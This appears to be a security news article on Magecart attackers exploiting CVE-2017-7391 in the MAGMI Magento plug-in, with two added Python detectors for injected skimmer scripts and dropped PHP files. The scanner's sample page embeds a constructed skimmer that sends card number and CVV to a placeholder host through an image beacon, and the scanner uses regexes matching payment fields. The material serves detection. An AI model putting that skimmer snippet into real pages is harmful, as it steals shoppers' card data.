Hackers are widely exploiting a 2017 vulnerability in a Magento plug-in that lets them compromise a merchant's e-commerce website and embed malicious code that skims customers' credit card data.
Magento, bought by Adobe for $1.68 billion in May 2018, is an open-source e-commerce platform that lets merchants build online stores and process payments. Because of the payment data it handles, it is a prime target for threat actors looking to steal shoppers' financial credentials.
It has persistently proven a lucrative target for attackers.
The FBI warned in a flash alert earlier this month that the hackers known collectively as Magecart (in reality a wide variety of groups) have been placing "e-skimming script directly on e-commerce websites and use HTTP GET requests to exfiltrate the stolen payment data via proxy compromised websites" by exploiting the 2017 vulnerability.
A shopper sees nothing unusual; all that a site owner inspecting the compromised storefront would find is a very small additional 'snippet' of script added to the website's source code. (This may seem old hat to security specialists, but it remains a rampant problem and a profitable one for cyber criminals.)
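The FBI's description above (a small injected script that reads the checkout form and exfiltrates card data with an HTTP GET to a third-party host) is enough to write a first-pass detector. The following is an added example, not code from the FBI alert or from Magento: it collects every script on a fetched storefront page, scores each one for the traits described, and reports scripts that both touch payment fields and reference a host outside the store's own domain. The sample page, the store hostname `shop.example.com` and the exfiltration host `cdn-stat.example.net` are all constructed for the example and are not real indicators.

```python
"""Heuristic scan of a storefront page for injected e-skimming scripts."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators drawn from the behaviour described above: the snippet reads the
# checkout's card fields, hooks the form, and exfiltrates via a GET (an
# Image() beacon is the classic primitive) to a host the store does not own.
PAYMENT_FIELDS = re.compile(r"cc_number|cc_cid|cc_exp|card_number|cvv|cvc|payment\[", re.I)
FORM_HOOKS = re.compile(r"addEventListener\(\s*['\"](submit|click|change|keyup)['\"]|\.onsubmit\s*=", re.I)
GET_PRIMITIVES = re.compile(r"new\s+Image\s*\(|\.src\s*=|fetch\s*\(|XMLHttpRequest|sendBeacon", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)


class _ScriptCollector(HTMLParser):
    """Collects every <script> on the page as (src attribute, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def is_first_party(host, site_host):
    return host == site_host or host.endswith("." + site_host)


def foreign_hosts(text, site_host):
    """Hostnames referenced in `text` that are not the store's own domain."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host and not is_first_party(host, site_host):
            hosts.add(host)
    return hosts


def score_script(src, body, site_host):
    """Return (score, reasons, foreign hosts) for one script; higher is worse."""
    score, reasons = 0, []
    if PAYMENT_FIELDS.search(body):
        score += 2; reasons.append("reads payment fields")
    if FORM_HOOKS.search(body):
        score += 1; reasons.append("hooks checkout form events")
    if GET_PRIMITIVES.search(body):
        score += 1; reasons.append("builds an outbound GET/beacon")
    hosts = foreign_hosts(body + (" " + src if src else ""), site_host)
    if hosts:
        score += 2; reasons.append("references third-party host(s)")
    return score, reasons, hosts


def scan_page(html, site_host, threshold=5):
    """Scripts scoring at/above threshold: a foreign host plus payment-field access."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for index, (src, body) in enumerate(parser.scripts):
        score, reasons, hosts = score_script(src, body, site_host)
        if score >= threshold:
            findings.append({"index": index, "src": src, "score": score,
                             "reasons": reasons, "foreign_hosts": sorted(hosts),
                             "snippet": body.strip()[:80]})
    return findings


# Constructed sample checkout page: two legitimate first-party scripts and one
# injected snippet of the kind described above (hosts are made-up example names).
SAMPLE_PAGE = """
<html><body>
<form id="co-payment-form" action="https://shop.example.com/checkout/onepage/savePayment">
  <input name="payment[cc_number]"><input name="payment[cc_cid]">
</form>
<script src="https://shop.example.com/js/checkout.js"></script>
<script>window.checkoutConfig={baseUrl:"https://shop.example.com/"};</script>
<script>document.addEventListener('DOMContentLoaded',function(){var f=document.getElementById('co-payment-form');f.addEventListener('submit',function(){var d=f.querySelector('[name="payment[cc_number]"]').value+'|'+f.querySelector('[name="payment[cc_cid]"]').value;(new Image()).src='https://cdn-stat.example.net/pixel.gif?d='+btoa(d);});});</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE, "shop.example.com"):
        print(finding)
```

Run it against the HTML you fetch from your own checkout page (not the admin's cached copy, since the injection may be conditional on the visitor) and against each external script it loads. The threshold is deliberately set so that the store's own checkout code, which legitimately reads card fields and submits them to the first-party domain, is not reported; a first-party script that has been tampered with will only be caught by the file-integrity check on the server side.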
Magento CVE Being Exploited
The particular vulnerability being exploited was first disclosed three years ago, when it was given the superficially unalarming CVSS score of 6.1 (medium severity).
CVE-2017-7391 is a cross-site scripting (XSS) vulnerability in version 0.7.22 of MAGMI (Magento Mass Importer), a plug-in used to bulk-load product data. The bug lets an attacker execute arbitrary HTML and script code in the browser of a user of the affected e-commerce site.
The simplest fix is to update MAGMI to version 0.7.23, which patches the XSS. MAGMI only works on older Magento 1 sites, in particular what is known as Magento Commerce 1. (Compounding the problem, Magento 1 will be unsupported from the end of June 2020.)
Using CVE-2017-7391, cyber criminals are compromising websites by injecting malicious PHP files into them. These PHP files let the attackers scrape payment card data and sensitive customer information such as addresses and contact details.
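Injected PHP files are a server-side artefact, and the most reliable way to spot them is to compare the webroot against a hash manifest taken from a known-good deployment. The block below is an added example, not a Magento or FBI tool: it builds a SHA-256 manifest of every `.php`/`.phtml` file, reports files that were added, modified or removed since the baseline, and separately flags any PHP that has appeared under upload and runtime directories (`media`, `var`, `skin`) where a stock Magento 1 install should never have executable code. The directory list and the simulated compromise in `demo()` are assumptions constructed for the example.

```python
"""Hash-manifest audit of a Magento webroot for dropped or tampered PHP files."""
import hashlib
import tempfile
from pathlib import Path

# Top-level directories of a stock Magento 1 webroot that hold uploads or
# runtime data and should never contain PHP (assumption; adjust per install).
NO_PHP_DIRS = ("media", "var", "skin")
PHP_SUFFIXES = (".php", ".phtml")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map of webroot-relative path -> SHA-256 for every PHP file under root."""
    root = Path(root)
    manifest = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in PHP_SUFFIXES:
            manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def audit(root, baseline):
    """Compare the live tree with a known-good manifest."""
    current = build_manifest(root)
    added = sorted(set(current) - set(baseline))
    modified = sorted(k for k in current.keys() & baseline.keys()
                      if current[k] != baseline[k])
    removed = sorted(set(baseline) - set(current))
    # PHP under upload/runtime paths is suspicious even if it is in the baseline.
    misplaced = sorted(k for k in current if k.split("/")[0] in NO_PHP_DIRS)
    return {"added": added, "modified": modified,
            "removed": removed, "misplaced": misplaced}


def demo():
    """Constructed walkthrough: snapshot a clean tree, simulate a compromise, audit."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        clean_files = {
            "index.php": "<?php require 'app/Mage.php';",
            "app/Mage.php": "<?php final class Mage {}",
            "media/catalog/product/a.jpg": "not php",
        }
        for rel, content in clean_files.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(content)
        baseline = build_manifest(root)

        # Simulated compromise (placeholder contents): a dropped file in the
        # media tree and a tampered core file.
        (root / "media/tmp").mkdir(parents=True)
        (root / "media/tmp/cache.php").write_text("<?php // dropped scraper (constructed placeholder)")
        (root / "app/Mage.php").write_text("<?php final class Mage {} /* injected */")
        return audit(root, baseline)


if __name__ == "__main__":
    print(demo())
```

Take the baseline from a fresh extraction of the same Magento release plus your own extensions, not from the live server after the fact, and store it off-box; a baseline captured from an already-compromised host will faithfully whitelist the attacker's files.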
Magento's security appears to need serious work: just last month Adobe released a security update that patched six critical vulnerabilities in Magento Commerce and Magento Open Source.
The vulnerabilities were serious: two allowed a security bypass, while the other four let attackers manipulate sites via command injection. All of these bugs allow hackers to seriously damage merchants' e-commerce sites and steal customer data. Adobe is urging Magento users to patch their shops immediately with the updates listed in its security bulletin.
In its third annual report, a review of its work in 2019, the UK's National Cyber Security Centre (NCSC) highlighted that Magento is a prime target for hackers and added that it had "conducted a successful trial to identify and mitigate vulnerable Magento carts via take down to protect the public. The work now continues. To date, the NCSC has taken down 1,102 attacks running skimming code (with 19 percent taken down within 24 hours of discovery)".